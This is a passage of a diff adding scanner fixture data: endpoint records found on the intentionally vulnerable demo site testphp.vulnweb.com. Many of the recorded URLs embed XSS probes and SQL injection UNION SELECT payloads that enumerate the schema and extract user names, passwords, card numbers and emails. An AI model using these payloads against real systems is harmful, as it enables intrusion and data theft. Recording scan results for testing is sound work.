"nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1760, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=1Attack", + "content_length": 4871, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:04.043Z", + "response_time": 0.34852523, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1761, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=1Current", + "content_length": 4872, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:04.195Z", + "response_time": 0.34803064499999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1762, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=1Database", + "content_length": 4873, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:04.335Z", + "response_time": 0.35216642000000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1763, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=2", + "content_length": 5193, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:04.475Z", + "response_time": 0.340495624, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1765, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=test", + "content_length": 4868, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:04.751Z", + "response_time": 0.34382692800000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1767, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=$%7Binjection", + "content_length": 4985, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:05.022Z", + "response_time": 0.349246644, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1769, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=%3Ciframe%20src%3d%22%2f%2fmv9e", + "content_length": 4995, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:05.332Z", + "response_time": 0.34034766, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1771, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=%3Ciframe%25", + "content_length": 4984, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:05.611Z", + "response_time": 0.348422116, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1772, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipT%3Econfirm%281%29%3C%2Fscript%3E", + "content_length": 5003, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:05.780Z", + "response_time": 0.349599557, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1773, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%253", + "content_length": 4985, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:08.019Z", + "response_time": 0.35332243, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1774, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Ealert(0x105C3E", + "content_length": 4998, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:08.161Z", + "response_time": 0.353227868, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1775, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Ealert(0x105C3E)%3C%2fscRipt%3E", + "content_length": 5008, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:08.299Z", + "response_time": 0.345731497, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1776, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Enetsparker(0x002752", + "content_length": 5003, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:08.434Z", + "response_time": 0.354698193, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1777, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Enetsparker(0x002752)%3C%2fscRipt%3E", + "content_length": 5013, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:08.638Z", + "response_time": 0.35817877800000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1778, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Enetsparker(0x105C3E", + "content_length": 5003, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:08.993Z", + "response_time": 0.340252932, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1782, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99", + "content_length": 4868, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:09.909Z", + "response_time": 0.35504321800000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1783, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0", + "content_length": 4871, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:11.550Z", + "response_time": 0.353203797, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1784, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0", + "content_length": 4874, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:12.621Z", + "response_time": 0.34101777099999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1785, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0%EF%80%A0", + "content_length": 4877, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:12.890Z", + "response_time": 0.340165263, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1786, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0%EF%80%A0%EF%82%B7", + "content_length": 4880, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:13.218Z", + "response_time": 0.35017953799999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1787, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+all+select+1,group_concat(%27user:%27,uname,%27----pass:%27,pass,%27-----cc:%27,cc,%27------email:%27,email),3,4,5,6,7,8,9,10,11+from+users--+", + "content_length": 5231, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:13.976Z", + "response_time": 0.356186551, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1788, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11", + "content_length": 5143, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:14.127Z", + "response_time": 0.35776872, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1789, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--", + "content_length": 5143, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:14.269Z", + "response_time": 0.347211321, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1790, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version", + "content_length": 5164, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:14.405Z", + "response_time": 0.34138099, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1792, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,database()--", + "content_length": 5147, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:14.676Z", + "response_time": 0.35380137100000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1793, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema", + "content_length": 4876, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:14.814Z", + "response_time": 0.34258266099999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1794, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema", + "content_length": 4876, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:14.973Z", + "response_time": 0.344371523, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1796, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables", + "content_length": 6165, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:15.286Z", + "response_time": 0.35163065899999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1797, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables", + "content_length": 41182, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:15.440Z", + "response_time": 0.352331687, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1799, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+", + "content_length": 5204, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:15.728Z", + "response_time": 0.358326227, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1800, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+", + "content_length": 8123, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:15.864Z", + "response_time": 0.357227349, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1801, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,version%28%29,3,4,5,6,database%28%29,8,9,10,user%28%29", + "content_length": 5184, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:15.999Z", + "response_time": 0.34839036, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1802, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_N", + "content_length": 4870, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:16.141Z", + "response_time": 0.356504452, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1803, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_NAME,%207,%208,%209,%2010%20FROM%20INFORMATION_SCHEMA.COLUM", + "content_length": 4872, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:18.386Z", + "response_time": 0.345293182, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1804, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%201,%202,%203,%204,%205,%20COLUMN_NAME,%207,%208,%209,%2010%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20N'users'", + "content_length": 8112, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:18.531Z", + "response_time": 0.345988276, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1806, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-20%20UNION%20SELECT%2011,%20uname,%202,%203,%204,%205,%20pass,%207,%208,%209,%2010%20FROM%20users", + "content_length": 5150, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:18.845Z", + "response_time": 0.34761802999999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1808, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-9999%20UNION%20SELECT%201,2,3,4,5,6,pass,8,9,10,11%20FROM%20users", + "content_length": 5146, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:19.353Z", + "response_time": 0.348202784, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1809, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-999999++UNION+SELECT+1%2Cuname%2C3%2C4%2C5%2C6%2Cversion%28%29%2C8%2Cpass%2C10%2C11+FROM+users", + "content_length": 5171, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:19.491Z", + "response_time": 0.3529354, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1812, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=.1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--", + "content_length": 5143, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:20.272Z", + "response_time": 0.349952038, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1817, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1", + "content_length": 7880, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:24.347Z", + "response_time": 0.35359360700000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1818, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%0A%0APour", + "content_length": 4979, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:24.487Z", + "response_time": 0.339961165, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1819, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%0A%0A%0Avoici", + "content_length": 4980, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:24.627Z", + "response_time": 0.354087202, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1820, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=0.or-1%23", + "content_length": 49414, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:24.762Z", + "response_time": 0.347216071, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1821, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4%20from%20information_schema.tables--%20-", + "content_length": 4890, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:24.903Z", + "response_time": 0.351534713, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1822, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--%20-", + "content_length": 44333, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:25.038Z", + "response_time": 0.348118395, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1824, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%2017-7%3d10CONFIRMED", + "content_length": 4875, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:25.336Z", + "response_time": 0.35656037300000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1825, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--%20-", + "content_length": 45584, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:25.471Z", + "response_time": 0.352351923, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1826, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%20OR%2017-7%3d10", + "content_length": 49414, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:25.628Z", + "response_time": 0.355779893, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1828, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%20Table_name%20as%20TablesName,%208,%209", + "content_length": 4872, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:25.895Z", + "response_time": 0.357330146, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1829, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%20and%201=1", + "content_length": 7880, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:26.031Z", + "response_time": 0.357578903, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 